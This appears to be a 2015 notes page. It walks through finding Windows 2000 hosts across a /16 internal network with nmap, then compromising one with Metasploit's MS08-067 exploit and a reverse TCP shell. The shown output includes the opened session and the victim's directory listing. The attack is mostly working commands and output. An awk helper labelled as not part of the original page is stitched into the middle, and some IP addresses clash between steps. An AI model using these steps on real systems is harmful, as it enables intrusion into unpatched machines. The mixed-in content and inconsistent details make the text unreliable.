
metasploit ms08_067_netapi on Windows 2000

Some nmap investigations beforehand

We want to find the exact version of the operating system on every SMB host in the range.

nmap -Pn --script smb-os-discovery.nse -pT:139,445 10.128.0.0/16 > 10.128.0.0-16.20150331.oss

Next we want to summarize the output: one line per host, keeping only the hosts reported as Windows 2000.

cat 10.12[815].0.0-16.20150331.oss | grep "\(Nmap\ scan\ report\ for\ \|OS:\|Computer\ name:\)" | sed ':a;N;$!ba;s/\n|\ \ / /g' | grep OS | grep "OS: Windows 2000"
Nmap scan report for mos.dummy.de (10.120.2.121)  OS: Windows 2000 (Windows 2000 LAN Manager)  Computer name: mos
Nmap scan report for tima.dummy.de (10.120.10.20)  OS: Windows 2000 (Windows 2000 LAN Manager)  Computer name: tima
Nmap scan report for idswin.dummy.de (10.120.10.31)  OS: Windows 2000 (Windows 2000 LAN Manager)  Computer name: IDSWIN
Nmap scan report for edsospc.dummy.de (10.120.10.39)  OS: Windows 2000 (Windows 2000 LAN Manager)  Computer name: edsospc
Nmap scan report for eds2.dummy.de (10.120.10.43)  OS: Windows 2000 (Windows 2000 LAN Manager)  Computer name: eds2
Nmap scan report for mcu.dummy.de (10.120.10.46)  OS: Windows 2000 (Windows 2000 LAN Manager)  Computer name: mcu
Nmap scan report for 10.121.169.121  OS: Windows 2000 (Windows 2000 LAN Manager)  Computer name: sv2002
Nmap scan report for lib01pc.dummy.de (10.128.74.20)  OS: Windows 2000 (Windows 2000 LAN Manager)  Computer name: dic
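The same summary as the grep/sed one-liner above, written as an awk state machine over nmap's normal output (added example, not part of the original page). The host names and addresses in the sample are constructed values, and the optional pattern argument is an assumption of this example so the same script can inventory other end-of-life versions.

```shell
# Added example (not from the original page): the same summary as the
# grep/sed one-liner above, as an awk state machine over nmap normal output.
# Host names and addresses below are constructed sample values.
# Constructed sample of what smb-os-discovery prints for two hosts;
# only the first is Windows 2000.
sample_report() {
    cat <<'EOF'
Nmap scan report for mos.example.test (10.0.0.5)
Host is up (0.0010s latency).

Host script results:
| smb-os-discovery:
|   OS: Windows 2000 (Windows 2000 LAN Manager)
|   Computer name: mos
|_  System time: 2015-03-31T12:00:00+02:00

Nmap scan report for 10.0.0.9
Host is up (0.0020s latency).

Host script results:
| smb-os-discovery:
|   OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
|   Computer name: fs01
|_  System time: 2015-03-31T12:00:01+02:00
EOF
}

# Read nmap output on stdin; print "host<TAB>os<TAB>computer name" for each
# host whose OS string matches $1 (default "Windows 2000"). A host's fields
# are flushed when the next "Nmap scan report" header or EOF is reached.
summarize_smb_os() {
    awk -v want="${1:-Windows 2000}" '
        function flush() {
            if (host != "" && os ~ want) printf "%s\t%s\t%s\n", host, os, name
        }
        /^Nmap scan report for / {
            flush(); host = $0; sub(/^Nmap scan report for /, "", host)
            os = ""; name = ""; next
        }
        /^[|]   OS: /            { os = $0;   sub(/^[|]   OS: /, "", os);   next }
        /^[|]   Computer name: / { name = $0; sub(/^[|]   Computer name: /, "", name); next }
        END { flush() }
    '
}

sample_report | summarize_smb_os
```

Feed it the real scan with `summarize_smb_os < 10.128.0.0-16.20150331.oss` (or a broader pattern such as `'Windows 2000|Windows XP'`) to get the unsupported-host list for the patching or decommissioning queue.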

Now let's try Metasploit on the last one.

# msfconsole
[...]
msf > 

Let's search for an exploit

msf> search smb
long output

msf > info windows/smb/ms08_067_netapi
Choose an exploit
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

Set target
msf exploit(ms08_067_netapi) > set RHOST 10.128.74.20
RHOST => 10.128.74.20

Search for a payload
msf exploit(ms08_067_netapi) > show payloads
long output

Choose a payload
msf exploit(ms08_067_netapi) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp

msf exploit(ms08_067_netapi) > show options

[...]
Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (accepted: seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port

[...]

Set payload options
msf exploit(ms08_067_netapi) > set LHOST 10.128.32.98
LHOST => 10.128.32.98

Check if the target is vulnerable

msf exploit(ms08_067_netapi) > check
[+] 10.128.73.21:445 - The target is vulnerable.

Run the exploit
msf exploit(ms08_067_netapi) > run

[*] Started reverse handler on 10.128.32.98:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2000 - Service Pack 4 with MS05-010+ - lang:English
[*] Selected Target: Windows 2000 Universal
[*] Attempting to trigger the vulnerability...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.128.74.20
[*] Command shell session 1 opened (10.128.32.98:4444 -> 10.128.74.20:4301) at 2015-03-31 13:25:49 +0200

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>cd c:\
cd c:\

C:\>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 14BB-15E2

 Directory of C:\

05/07/2010  08:38a      <DIR>          adaptec
09/23/2010  12:24p                  83 ADIC_PROGRESS.TXT
07/11/2006  11:59a                 489 ARCSETUP.LOG
12/04/2014  10:41a      <DIR>          backup
07/11/2006  01:06p      <DIR>          CA_APPSW
05/05/2011  11:39a      <DIR>          Documents and Settings
12/04/2014  12:38p      <DIR>          HF-1_SDLC2.8
12/29/2003  09:52p      <DIR>          Inetpub
11/10/2004  09:05p              15,369 installer_debug.txt
09/28/2005  08:22p      <DIR>          Logs
07/11/2006  12:01p      <DIR>          NSM
03/30/2015  01:00p      <DIR>          ntbackup
06/28/2013  12:26p                 279 nw_install.log
06/28/2013  12:27p                  54 nw_install_status.log
08/23/2006  12:04p             155,303 ObjectServer.Trace
03/31/2015  01:30p             772,316 ObjectServer1.trace
10/09/2004  01:34a               6,522 odbcconf.log
12/29/2014  01:32p               1,165 oswrapper1.log
12/08/2014  10:35a      <DIR>          Program Files
05/22/2007  11:17a      <DIR>          rgrg
04/08/2014  03:21p      <DIR>          WINNT
12/30/2003  12:25a      <DIR>          WUTemp
               9 File(s)        951,580 bytes
              13 Dir(s)  25,875,365,888 bytes free

C:\>exit
exit
^C
Abort session 1? [y/N]  y

[*] 10.128.74.20 - Command shell session 1 closed.  Reason: User exit